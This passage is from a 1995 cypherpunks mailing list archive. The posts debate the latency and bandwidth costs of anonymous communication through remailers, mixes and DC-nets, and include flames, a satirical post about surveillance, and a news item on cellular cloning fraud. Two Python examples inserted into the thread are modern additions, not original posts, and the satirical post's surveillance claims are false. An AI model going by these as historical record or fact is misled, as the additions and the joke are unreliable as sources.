bandwidths and switching speeds.

Another possibility with connection-based communications would be
Chaum's DC-Nets.  These are networks where message source cannot be
determined.  They do face potentially severe costs in terms of
bandwidth, though, depending on how much anonymity you get.  As both
mixes and dcnets have bandwidth costs, I wonder if it is provable that
anonymity implies such costs.

> Can anyone give me an estimate of when truly anonymous video conferencing 
> will become possible?  This is not just to help me make the point, but 
> I'm really wondering.
> 
> Wei Dai

I think it may be more useful rather than speaking of "true" anonymity
to think of factor-of-N anonymity.  This reflects the bandwidth costs.  I
would guess that, if you have a packet-based video conferencing system,
that today you could probably get factor-of-2 anonymity with custom
hardware, and perhaps even more than that.

One other point I would make, based on Wei's original post, is that no
doubt anonymity does exact some costs.  However this does not mean that
it is uncompetitive.  It also may have, in some circumstances,
advantages.  People may be more frank and critical when they are shielded
by anonymity.  I've read articles about companies which introduce
electronic "suggestion boxes" where people can post anonymously, and
upper management is often shocked at the results.  It is too early to
judge how much of a net benefit or harm anonymity will be in general.

Furthermore, it is likely that the net advantage will differ depending on
the business or organization.  At one extreme, a group working with
illegal or restricted technology would probably benefit more from
anonymity.  I think it was Keith Henson who posted a story here a couple
of years ago that he was working on, involving some kind of underground
protest group which organized itself using crypto anonymity.  So it is
really not a question of whether anonymity is good or bad, but rather
whether its costs outweigh its advantages in a particular situation.

Hal Finney
hfinney@shell.portal.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLw8c9xnMLJtOy9MBAQFZBgH/R1c3FLHECJiEHDoUl/gUPaBIVzd3kvVz
Uv2jqFwJxSFQjnrb1wtGT7vLjNOOXJ7uYpBNJU+ZfPSKOvPgGFD8yQ==
=+6iw
-----END PGP SIGNATURE-----
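
Added example, not part of Hal Finney's message or of any code posted to the list: one round of the DC-net he mentions, showing where its bandwidth cost comes from. Each of the N participants broadcasts a full-length announcement so that one message gets through, and two senders in the same round garble each other. The function names and the use of Python's secrets module for the pairwise pads are assumptions of this example.

```python
"""One round of a dining-cryptographers network (DC-net), as an added example."""
import secrets
from itertools import combinations


def xor_bytes(a, b):
    """Byte-wise XOR of two equal-length byte strings."""
    return bytes(x ^ y for x, y in zip(a, b))


def pairwise_pads(n, length):
    """One fresh random pad per unordered pair of participants.

    Constructed here for the demo; in a deployed DC-net each pair would
    derive its pad stream from a key the two of them share.
    """
    return {pair: secrets.token_bytes(length)
            for pair in combinations(range(n), 2)}


def announcement(me, n, pads, length, message=None):
    """What participant `me` broadcasts in this round.

    XOR of every pad `me` shares with another participant, further XORed
    with `message` if `me` is sending. Without the pads, an observer sees
    random-looking bytes whether or not `me` is the sender.
    """
    out = bytes(length)
    for other in range(n):
        if other != me:
            out = xor_bytes(out, pads[tuple(sorted((me, other)))])
    if message is not None:
        out = xor_bytes(out, message)
    return out


def dc_round(n, senders, length):
    """Run one round with `n` participants.

    `senders` maps participant index -> message (exactly `length` bytes).
    Returns (combined_output, list_of_announcements). Every pad appears in
    exactly two announcements, so the pads cancel in the combined XOR and
    only the message(s) remain.
    """
    pads = pairwise_pads(n, length)
    anns = [announcement(i, n, pads, length, senders.get(i))
            for i in range(n)]
    combined = bytes(length)
    for a in anns:
        combined = xor_bytes(combined, a)
    return combined, anns


def bandwidth_cost(n, length):
    """Bytes broadcast in one round: every participant sends `length` bytes,
    even though at most one useful message of `length` bytes is delivered."""
    return n * length


if __name__ == "__main__":
    msg = b"Attack at dawn"
    out, anns = dc_round(5, {2: msg}, len(msg))
    print("recovered:", out)
    print("bytes broadcast:", sum(len(a) for a in anns),
          "for a", len(msg), "byte message")
    # Failure mode: two senders in one round collide and garble each other.
    garbled, _ = dc_round(5, {0: b"AAAA", 3: b"BBBB"}, 4)
    print("collision output:", garbled)
```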




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Sat, 7 Jan 95 12:18:49 PST
To: Oren Tanay <RopeGun@calvino.alaska.net>
Subject: Re: pgp shells for windows....
In-Reply-To: <Chameleon.950107020459.RopeGun@RopeGun.alaska.net>
Message-ID: <Pine.SOL.3.91.950107151525.1686A-100000@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 7 Jan 1995, Oren Tanay wrote:

[PGP Windoze front-end request. . .]

In response to a similar question a wiser head than mine suggested 
looking in ftp to 

unix.hensa.ac.uk/pub/uunet/pub/security/virus/crypt/pgp/shells



C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Sat, 7 Jan 95 15:45:24 PST
To: cypherpunks@toad.com
Subject: Anonymity and cost
Message-ID: <199501072330.AA30350@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Wei Dai writes:

> Anonymous e-mail that goes through a chain of N remailers will cost at
> least N times as much bandwidth and have N times as much latency as normal
> e-mail.  But e-mail is hardly the state-of-the-art of network
> communication, while anonymous e-mail IS the state of the art for
> anonymous communication.  How long will it take for the technology of
> anonymous video conferencing to develop, for example?  By then, of
> course, those who are not concerned with anonymity will probably have
> things such as full sensory virtual interaction. 

At a very basic level, anonymous (not pseudonymous, like the remailers
are) messages are *cheaper*, because they carry less information; they
do not need to send the bits which identify the sender. 

This conversation seems to elide distinctions between low-level
anonymity (where source information is simply not transmitted) and
high-level anonymity, where source information is transmitted but is
not used for social or political reasons.

Anonymous remailers are considered "anonymous" because (some of us)
agree that we won't treat the "From:" line as indicating the real
author of the text below. We agree this because we know how
remailers work; we know that (probably) the person who wrote the
message isn't the same person as the owner of the "From:" address.

When we say a message is "anonymous" we mean that its real author
should not/cannot be connected with the text of the message. We could
just as easily agree on an "Identify-Author:" header field by which
authors could indicate whether or not they wished to be speaking
"on the record" when they wrote the message. 

A multi-hop message where the "From:" line changes with each hop
costs almost precisely what a multi-hop message would cost without
the "From:" line changes. Folks feeling detail-oriented can calculate
the cost of the CPU time to strip header information vs. the cost of
sending that header information to the next hop. I don't care about
the answer, so I'm not going to.

Anonymous video conferencing is available now; go to Kinko's, pay
cash for the use of their video conference room. Or, ask/convince
the recipient to consider the conversation "off the record". 

Current remailer operators experience a cost in that they 
receive some amount of hassle and exposure to liability by
running remailers; but this is merely a "cost" shifted from one
person (the author) to another, the surrogate author. This may
look like a cost of anonymity but it's more accurately 
described as the cost of being provocative or rude or illegal.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLw8j133YhjZY3fMNAQGB5QP9HCgA2QiHLPVupVgOeU/Tez5SH8Ie3ch3
nSJreSYl3a97blPr/aI1Yx577EQuCwrHoyZKWWpVc/8u728i10gTbJPbavzpDBOw
i3JawSt4+d/tMWBfLzYHzdrVALIcTZeGnmLLbfgzWzzC8NUDsDG/ppDB7sDq2ktf
NiwvDeQzoYk=
=oU42
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Sat, 7 Jan 95 15:38:25 PST
To: jsled@free.org (Josh Michael Sled)
Subject: Don't Say Anything More in Public!
In-Reply-To: <199501072319.RAA03833@squeaky.free.org>
Message-ID: <199501072338.PAA04770@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Josh Michael Sled wrote:
...
> The idea of the Chinese Lottery seemed to be rather far fetched in my
> first few readings, but then I came across the discussion of the new
> Emergency Broadcast System.
> 
> This may just be an unfair helping of paranoia, but the system seems
> to be a  perfect distribution system for a Chinese Lottery-like
> keychecking or cracking system. Even though the public can turn off the
> broadcast, the signal will still be sent.  The chips may even be
> government-regulated... available only from the government so no one can
> tamper with the signal and use this system for their own
> information-dissemination needs (*ahem* Political agendas *ahem*
> re-election ads).  They might even encrypt the signals, for a touch of
> irony.  Anyone find fault in this?

Josh, I'm sending this note to you privately--please don't comment
anymore in public on this! You could be undermining national
insecurity by revealing this system!

More than just key-crackers are included in the Emergency Broadcast
System boxes. In addition, the red LED acts just as the LEDs on cable
set-top boxes act, namely, as an infrared sensor. These LEDs can count
the numbers of citizen-units in the same room as the unit, and can of
course even detect the thermal signature of a drug abuser (flushed skin,
dilated eyes, etc.).

The key-cracking functions are only incidental. In fact, they may not
even be cost-effective. I was told last year by the NSA's A.U.N.T.I.E.
(Authorization Unit for Non-Terminal Industrial Enterprises)
group that the real key-cracking crunch is contained in the *Clipper*
phones, which of course have crypto modules and can do all the right
calculations. 

They can also occasionally dial the Clipper phone ("Sorry, wrong
number.") and check on the progress of calculations. Mysterious phone
calls in the middle of the night should rightly worry folks--it may
mean your number's up.

But don't discuss this on the list! If you do, she'll have us killed.
(And don't call her Dotty!)

--Klaus! von Future Prime, being channelled by Carol
Moore^H^H^H^H^HAnne Braddock





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Sat, 7 Jan 95 16:18:40 PST
To: greg@ideath.goldenbear.com (Greg Broiles)
Subject: Re: Anonymity and cost
In-Reply-To: <199501072330.AA30350@ideath.goldenbear.com>
Message-ID: <199501080018.QAA11241@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Greg Broiles wrote:

> At a very basic level, anonymous (not pseudonymous, like the remailers
> are) messages are *cheaper*, because they carry less information; they
> do not need to send the bits which identify the sender. 

I think the meaning of "anonymous" here is clearly with respect to
_traffic analysis_. The "cost of anonymity" is with respect to the
costs and delays of using digital mixes (remailers). The relatively
few bytes of header information don't affect the cost in any
substantive way.

> This conversation seems to elide distinctions between low-level
> anonymity (where source information is simply not transmitted) and
> high-level anonymity, where source information is transmitted but is
> not used for social or political reasons.

Again, traffic analysis is the issue. (And I don't necessarily mean
NSA-type traffic analysis...Net-savvy investigators can trace messages
back to origins even when a message is ostensibly anonymous. So far as
I know, some form of mix/remailer is needed to ensure anonymity.)

> A multi-hop message where the "From:" line changes with each hop
> costs almost precisely what a multi-hop message would cost without
> the "From:" line changes. Folks feeling detail-oriented can calculate
> the cost of the CPU time to strip header information vs. the cost of
> sending that header information to the next hop. I don't care about
> the answer, so I'm not going to.

??? 

This is not the "cost" that is being discussed. Stripping or changing
headers is a trivial cost compared to the latency delays that may
result when mix reordering is done (how much latency is involved is a
function of several things, including reordering desired ("N"), amount
of other traffic).

> Anonymous video conferencing is available now; go to Kinko's, pay
> cash for the use of their video conference room. Or, ask/convince
> the recipient to consider the conversation "off the record". 

Neither of these kinds of "anonymity" are cryptographically
interesting, or strong.

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay
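
Added example, not part of the thread: a queueing model of the kind Tim May asks for, covering the point made here and in Adam Shostack's earlier message that reordering latency depends on the batch size N and on the volume of other traffic. It assumes a threshold mix (hold until N messages are queued, then flush in random order), Poisson arrivals, and independent hops with equal traffic; all function names are hypothetical.

```python
"""Latency of a threshold mix as a function of batch size and traffic rate."""
import math
import random


def simulate_threshold_mix(rate, batch_size, n_messages, seed=0):
    """Simulate one mix node.

    Messages arrive as a Poisson process with `rate` messages per second.
    The mix holds them until `batch_size` are queued, then flushes the
    whole batch in shuffled order. Returns the per-message delay (seconds
    between arrival and flush) for every flushed message.
    """
    rng = random.Random(seed)
    now = 0.0
    pool = []      # arrival times of messages waiting in the mix
    delays = []
    for _ in range(n_messages):
        now += rng.expovariate(rate)   # exponential inter-arrival time
        pool.append(now)
        if len(pool) == batch_size:
            rng.shuffle(pool)          # output order hides arrival order
            delays.extend(now - t for t in pool)
            pool.clear()
    return delays


def expected_delay(rate, batch_size, hops=1):
    """Analytic mean delay.

    The i-th arrival in a batch waits for N - i further arrivals, each
    taking 1/rate on average, so the mean over a batch is (N - 1) / (2 * rate)
    per hop.
    """
    return hops * (batch_size - 1) / (2.0 * rate)


def simulate_chain(rate, batch_size, hops, n_messages, seed=0):
    """End-to-end delays through `hops` mixes.

    Assumption: each hop sees independent traffic at the same rate, so a
    message's total delay is the sum of one independent draw per hop.
    """
    per_hop = [simulate_threshold_mix(rate, batch_size, n_messages, seed + h)
               for h in range(hops)]
    return [sum(d) for d in zip(*per_hop)]


def anonymity_bits(batch_size):
    """Upper bound on an observer's uncertainty about one flushed message:
    it is one of `batch_size` candidates."""
    return math.log2(batch_size)


def required_rate(batch_size, hops, target_latency):
    """Traffic (real plus dummy) each mix needs, in messages per second,
    to keep the mean end-to-end delay at or below `target_latency`."""
    return hops * (batch_size - 1) / (2.0 * target_latency)


if __name__ == "__main__":
    print("rate/s  N  hops  simulated  analytic  bits/hop")
    for rate in (0.01, 0.1, 1.0, 10.0):
        for n in (5, 20):
            sim = simulate_chain(rate, n, 3, 20000, seed=1)
            print(f"{rate:6}  {n:2}  3  {sum(sim) / len(sim):10.1f}"
                  f"  {expected_delay(rate, n, 3):8.1f}"
                  f"  {anonymity_bits(n):.2f}")
```

Because the mean delay is proportional to (N - 1) / rate, a tenfold rise in traffic cuts latency tenfold at the same batch size, which is the effect Adam Shostack describes.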





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sat, 7 Jan 95 16:37:54 PST
To: "Timothy C. May" <tcmay@netcom.com>
Subject: Re: Latency, bandwidth, and anonymity
In-Reply-To: <199501072258.OAA28744@netcom4.netcom.com>
Message-ID: <Pine.SUN.3.91.950107160532.8939C-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 7 Jan 1995, Timothy C. May wrote:

> The tradeoffs are best analyzed with an actual mathematical model of
> nodes, traffic rates, clumping of traffic, etc., rather than our
> hand-waving here (hand-waving is OK for broad conceptual points, but
> not in cases like this).

Are there any theoretical tools developed especially for this type 
of analysis?  If so, can anyone provide some references?

> I'll be interested in what others calculate, but I think "conversation
> mixes" are several years off, at best. The upcoming demo of Voice PGP
> by Phil Zimmermann (scheduled to appear at the Demo Day meeting next
> Saturday) may be a step in this direction.

Secrecy will of course have to come before anonymity.  I am eagerly 
awaiting Voice PGP, but unfortunately can't make the Demo Day meeting.  
Will someone please report the highlights?

> In other words, there are economic as well as technologic reasons I
> doubt we'll see low-latency, high-bandwidth audio or video remailers
> anytime soon. (As we're seeing now: short messages can get through in
> tens of seconds, 

So, the situation: high-latency, low-bandwidth e-mail remailers
the goal: low-latency, high-bandwidth interactive A/V type anonymity, but 
this seems too far away

Perhaps we can tackle the problems of latency and bandwidth separately.  
That is, develop 2 sets of anonymity tools:
1. low-latency, low-bandwidth, for use in textual interactions such as MUD 
and IRC
2. high-latency, high-bandwidth, for non-interactive A/V use, perhaps 
anonymous TV broadcasting

I'm not too familiar with DC-nets, but they can probably be used as 
tool set #1. (correct me if i'm wrong) How about tool set number 2?

> My suspicion is that Alice and Bob cannot defeat traffic analysis
> while ~10K bits per second are flowing continuously between them
> (audio), at least not until _many_ subnetworks are _much_
> faster. Also, the CPU loads would be great (= costly). Video is even
> further off. Tricks to reduce bandwidth may help.

Indeed, Vinge makes use of such a trick in True Names.  If I remember 
correctly, the technology in the story includes the ability to compress 
full virtual reality type interactions down to a few hundred bytes per 
second! (maybe it was thousands, but either way it seems unlikely) 
Vinge seems to be a stronger believer of compression.  There is a
similar technology in A Fire Upon the Deep.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Sat, 7 Jan 95 14:57:34 PST
To: Carol Anne Braddock <carolann@mm.com>
Subject: Re: Killfiles 101
In-Reply-To: <Pine.3.89.9501070625.I14788-0100000@downburst.mm.com>
Message-ID: <Pine.3.89.9501071651.A8927-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 7 Jan 1995, Carol Anne Braddock wrote:

all responses and replies and nonsensical remarks to this post can be taken 
off the cypherpunks list and directed to me carol, or whomever decides to 
respond, unless of course something productive pops out of it.

> 
> 1. The best and only way you can be sure you're 
>    killing a file is to turn your machine off.
>    Only then can you be sure it is dead.
> 
wow, she knows about puns, cool.

> 2. If you must resort to using killfiles,
>    (great marketer trick, make you use it 
>    again and again, and again, like a gun)
>    kill "classes" of files, as opposed to
>    individuals, you'll get better kill ratio.
>    A good example is anon or wizvax users.
> 
class of users is too vague and I fear I may kill something I want to 
read.  I have never come to a point where I knew all posts from such and 
such site or class of users were not worth my time, but I have run across 
dozens of individuals who I realized said nothing I wanted to waste a "d" 
or "n" keystroke on.

> 3. Note: Killfiles are a censor's best friend!
>    And you'll become what you swore you wouldn't.
> 
Bullshit, you sound like Doctress fuckin Neutopia.  Kill files are not 
censorship at all, do you pay attention to everything that comes your 
way?  Do you read every last scrap of paper people put in front of you?  
Do you go out and buy every fuckin periodical just in case there is an 
article in them you want, or are you intelligent enough to make 
judgements to conserve your time and sanity by not wasting your time on 
information resources you know will bring nothing to you.  If I really 
wanted to censor or kill you Carol, and not simply avoid having to "d" 
thru a good thirty messages I don't want to read, you wouldn't be 
replying to this at all dear.

> does your signature tell the truth nesta? Can't know everything 
> with a killfile! Eventually you'll kill the file that'd get you sex.

So far your posts have told me nothing I didn't already know.  Damn Carol, 
I was on your side until you started to REALLY SPAM.


i want to know everything          http://www.mcs.com/~nesta/home.html
i want to be everywhere                     Nesta's Home Page        
i want to fuck everyone in the world               &
i want to do something that matters         /-/ a s t e zine




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Sat, 7 Jan 95 17:00:48 PST
To: weidai@eskimo.com (Wei Dai)
Subject: Re: Latency, bandwidth, and anonymity
In-Reply-To: <Pine.SUN.3.91.950107160532.8939C-100000@eskimo.com>
Message-ID: <199501080059.QAA19944@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Wei Dai wrote:
...
> Are there any theoretical tools developed especially for this type 
> of analysis?  If so, can anyone provide some references?

No, this is too small a community for such tools to exist
off-the-shelf. Start with the standard mix papers, mentioned here
often. Also, Hal Finney made a first stab at a more careful
calculation of just how well remailers do their job...this was about
half a year ago, as I recall.

> So, the situation: high-latency, low-bandwidth e-mail remailers
> the goal: low-latency, high-bandwidth interactive A/V type anonymity, but 
> this seems too far away

The goal for whom? I find IRC a waste of time, so "anonymous
audiovisual" is not even on my radar screen of things of interest. I
think it's >10 years off.

> Perhaps we can tackle the problems of latency and bandwidth separately.  
> That is, develop 2 sets of anonymity tools:
> 1. low-latency, low-bandwidth, for use in textual interactions such as MUD 
> and IRC
> 2. high-latency, high-bandwidth, for non-interactive A/V use, perhaps 
> anonymous TV broadcasting

Think market. I don't see anyone paying for this until costs drop
dramatically.


--Tim May



-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sat, 7 Jan 95 17:08:42 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: Latency Costs of Anonymity
In-Reply-To: <199501072300.PAA25794@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.950107164103.8939E-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 7 Jan 1995, Hal wrote:

> This technology does sound like mixing could work pretty well to provide
> anonymity.  There is some price in bandwidth and latency but ATM is so
> fast that probably several steps of chaining and mixing would be
> possible.  Naturally such mixes would have to be hardware based due to the
> rapid speeds of the packets.  So this would be kind of a "souped up"
> version of our current email remailer network, with vastly greater
> bandwidths and switching speeds.

The problem here is that you'll have to do an RSA operation on EACH 
packet.  Pretty hard on the CPU...

> I think it may be more useful rather than speaking of "true" anonymity
> to think of factor-of-N anonymity.  This reflects the bandwidth costs.  I
> would guess that, if you have a packet-based video conferencing system,
> that today you could probably get factor-of-2 anonymity with custom
> hardware, and perhaps even more than that.

I'm not exactly sure what you mean by "factor-of-N".  I only used "true" 
to distinguish it from "trivial" anonymity (such as using a pay phone).  
Of course, anonymity, like security, can only be relative.

> One other point I would make, based on Wei's original post, is that no
> doubt anonymity does exact some costs.  However this does not mean that
> it is uncompetitive.  It also may have, in some circumstances,
> advantages.  People may be more frank and critical when they are shielded
> by anonymity.  I've read articles about companies which introduce
> electronic "suggestion boxes" where people can post anonymously, and
> upper management is often shocked at the results.  It is too early to
> judge how much of a net benefit or harm anonymity will be in general.
> 
> Furthermore, it is likely that the net advantage will differ depending on
> the business or organization.  At one extreme, a group working with
> illegal or restricted technology would probably benefit more from
> anonymity.  I think it was Keith Henson who posted a story here a couple
> of years ago that he was working on, involving some kind of underground
> protest group which organized itself using crypto anonymity.  So it is
> really not a question of whether anonymity is good or bad, but rather
> whether its costs outweigh its advantages in a particular situation.

This is all very true.  I guess I'm just lamenting the loss of my earlier,
more naive dream that one day everyone will be anonymous (read
pseudonymous), and that physical and digital identities will be totally
separate. 

Wei Dai
Who should really start signing his posts but left his key in another 
computer.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsled@free.org (Josh Michael Sled)
Date: Sat, 7 Jan 95 14:59:43 PST
To: cypherpunks@toad.com
Subject: Chinese EBS
Message-ID: <199501072319.RAA03833@squeaky.free.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've been reading through "Applied Cryptography," as every good boy
and girl should :) and one of the concepts struck out at me recently. 
The idea of the Chinese Lottery seemed to be rather far fetched in my
first few readings, but then I came across the discussion of the new
Emergency Broadcast System.

This may just be an unfair helping of paranoia, but the system seems
to be a perfect distribution system for a Chinese Lottery-like
keychecking or cracking system. Even though the public can turn off the
broadcast, the signal will still be sent.  The chips may even be
government-regulated... available only from the government so no one can
tamper with the signal and use this system for their own
information-dissemination needs (*ahem* Political agendas *ahem*
re-election ads).  They might even encrypt the signals, for a touch of
irony.  Anyone find fault in this?

- -Joshua M. Sled <jsled@ctp.org/jsled@free.org>

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBLw3WJqTT29daLBKRAQFbRgP/RAhGdEmxMe4zOuLORY9rKu7VhapXen7S
6+cVOvrlOxJ2ohCmxZpXbwKY9oR6ggF1jURwb9LZEiHPfzaOOsftURxcmJUsC2db
1vkSRuBarkm6vOK+JIlLMwKzRdk9omt+TmJPD7/wI5M1jhMfLRNS+fkbEpDFtisn
0s1H2nvXdDs=
=kGbJ
-----END PGP SIGNATURE-----

---
  KWQ/2 1.2g NR  "MTV get off the air!" - DKs
                                                                                                       




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Sat, 7 Jan 95 15:53:56 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: The first reply came 3 days later.
In-Reply-To: <Pine.3.89.9501070243.B14788-0100000@downburst.mm.com>
Message-ID: <Pine.3.89.9501071725.D8927-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain



From my present calculations approximately 14 percent of my mail for the 
last two days has been from Carol Ann, this is not a small feat 
considering the amount of mailing I usually receive.
Perhaps if Carol would post a well thought out and written article on 
what happened, instead of posting a thousand little "me toos" and "told 
ya so's" and such, this wouldn't be so annoying.  Rough estimate of mine 
is that she is responsible for 30 some percent of the traffic on 
cypherpunks at this time.

Worse part is that because I receive my mail thru a SLIP link which is 
admittedly slow, I still have to receive all noise messages thru my SLIP 
link before procmail can trash/delete/redirect them.  So now taking this 
into consideration, it seems that Carol Ann is responsible for more 
thruput on my SLIP link than myself, since mostly I receive mail thru it.  
It's a close call, me or Carol, that's counting in FTPs and WWW browsing.  
I mean maybe I should charge her money now 8) 

i want to know everything          http://www.mcs.com/~nesta/home.html
i want to be everywhere                     Nesta's Home Page        
i want to fuck everyone in the world               &
i want to do something that matters         /-/ a s t e zine




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an172607@anon.penet.fi (duquesne duke)
Date: Sat, 7 Jan 95 10:55:27 PST
To: cypherpunks@toad.com
Subject: cel fraud
Message-ID: <9501071759.AA00953@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



Fighting Cellular Fraud, New York To Washington
BEDMINSTER, NEW JERSEY, U.S.A., 1995 JAN 6 (NB) -- Bell Atlantic Mobile (BAM,
parent NYSE:BEL) and NYNEX Mobile Communications (parent NYSE:NYN), two large
US cellular phone carriers, are about to block automatic "roaming" service in
New York City and surrounding areas. Starting January 9, BAM customers who
place calls in the city will need to enter a personal identification number
(PIN) issued by BAM in order to complete the call.

The new policy is an antifraud measure to combat criminals who steal cellular
service, BAM said. The PIN system was developed by NYNEX and is in use inside
the City now, NYNEX sources said. Both firms emphasized that the new policy
is no magic wand to do away with cellular fraud. However, as a BAM
spokesperson told Newsbytes, the combination of restricted roaming and PIN
numbers will "raise the bar again" where cellular fraud is concerned.

Under the new system, the two cellular carriers will restrict calls in the
greater NYC area by roaming customers from a "Fraud Protection Zone" that
includes Washington, D.C.; Baltimore; Pittsburgh; and greater Philadelphia,
including Delaware and southern New Jersey.

BAM adopted the new measures because of increasing problems with cloning, in
which a criminal picks off a cellular customer's automated phone IDs during a
legitimate call and uses them to make a "clone phone." The cloned phone can
be used to make calls for which the legitimate customers, not the cloners,
are billed.

AT&T's Steve Fleischer, speaking to Newsbytes, said such cloning operations
have become such a successful criminal industry that some criminals sell the
phones with 30-day guarantees.

"If a number is cut off, you can bring it back to the cellular bandits and
have it reprogrammed for no additional charge," he explained. "It costs the
carriers around $1 million a day."

He paused, then added: "It just shows how big a demand there is for wireless
communications."

Under the new policy, customers from inside the protected zone who want to
use their phones at standard "roaming" rates in New York City must first
contact BAM by dialing 211 from their cellular phone. After they provide
proper identification and select a PIN code, the company deactivates the
fraud zone lock-out.

NYNEX spokesperson Kim Ancin told Newsbytes that customers with PIN numbers
place calls much as usual by dialing the destination number and pressing the
Send button. However, on protected phones, the customer then punches in the
PIN number and presses Send again.

Ancin explained that the PIN number goes out on a frequency different from
the initial send. Cellular bandits use special equipment to pick up a
legitimate phone's mobile identification number (MIN) and electronic serial
number (ESN), which until now have been enough to clone a phone. However, she
said, adding a PIN number on a second frequency makes cloning much more
difficult.

BAM said it would not activate the fraud protection lock-out in northern New
Jersey, where calls to New York City are local calls. However, since
customers who travel frequently into the city are at risk from cloning, the
firm strongly recommended that northern New Jersey customers sign up for a
PIN. Eventually, the firm said, all new customers will be required to select
PINs.

BAM said if a bandit does succeed in cloning a PIN-equipped phone, a customer
can simply change the PIN number. Customers without PIN numbers must bring
their phones back to a carrier or dealer to install a new phone number,
notify business associates and friends of the number change, and modify
business cards and stationery.

There is no extra charge for PIN numbers, which are implemented by software
at the carrier's switch, BAM's Fleischer told Newsbytes. The feature will not
affect commonly used cellular services like voice mail or call waiting. Calls
to 911, 611 and 411 will not require a PIN.

(Craig Menefee/19950106/Press Contact: Steve Fleischer, 908-306-7539 or Brian
Wood, 908-306-7508, both of BAM; Kim Ancin, 914-365-7573, or Jim Gerace, 914-
365-7712, both of NYNEX)


-------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
Due to the double-blind, any mail replies to this message will be anonymized,
and an anonymous id will be allocated automatically. You have been warned.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sat, 7 Jan 95 18:02:18 PST
To: "Timothy C. May" <tcmay@netcom.com>
Subject: Re: Latency, bandwidth, and anonymity
In-Reply-To: <199501080059.QAA19944@netcom10.netcom.com>
Message-ID: <Pine.SUN.3.91.950107171621.17000A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 7 Jan 1995, Timothy C. May wrote:

> > Perhaps we can tackle the problems of latency and bandwidth separately.  
> > That is, develop 2 sets of anonymity tools:
> > 1. low-latency, low-bandwidth, for use in textual interactions such as MUD 
> > and IRC
> > 2. high-latency, high-bandwidth, for non-interactive A/V use, perhaps 
> > anonymous TV broadcasting
> 
> Think market. I don't see anyone paying for this until costs drop
> dramatically.

Oops, I didn't mean to exhort anyone to actually make the tools, but was
just thinking about the feasibilities.  (I know, "Cypherpunks write code",
not "Cypherpunks convince others to write code." ;) OTOH, I DO think
people with anonymity needs will pay for lower latency and/or higher
bandwidth (right now probably tool set #1 will have a greater demand,
given the heavy use of MUDs and IRC). 

In the longer term, anonymous communication is in danger of being used
only by fringe groups if it falls too much behind the non-anonymous kind
in terms of latency and bandwidth (and cost, I guess).  Maybe ONLY drug
dealers, nuclear terrorists, etc., will use anonymous remailers when full
sensory virtual interaction is the most popular way for most people to
communicate and remailers are still the only choice for the
anonymity-conscious.  By then, the remailers themselves will be in
danger of being outlawed, or just close down for lack of business.

> I find IRC a waste of time, so "anonymous audiovisual" is not even on my
> radar screen of things of interest. I think it's >10 years off. 

I think limited virtual interaction can be available on the Internet in 5 
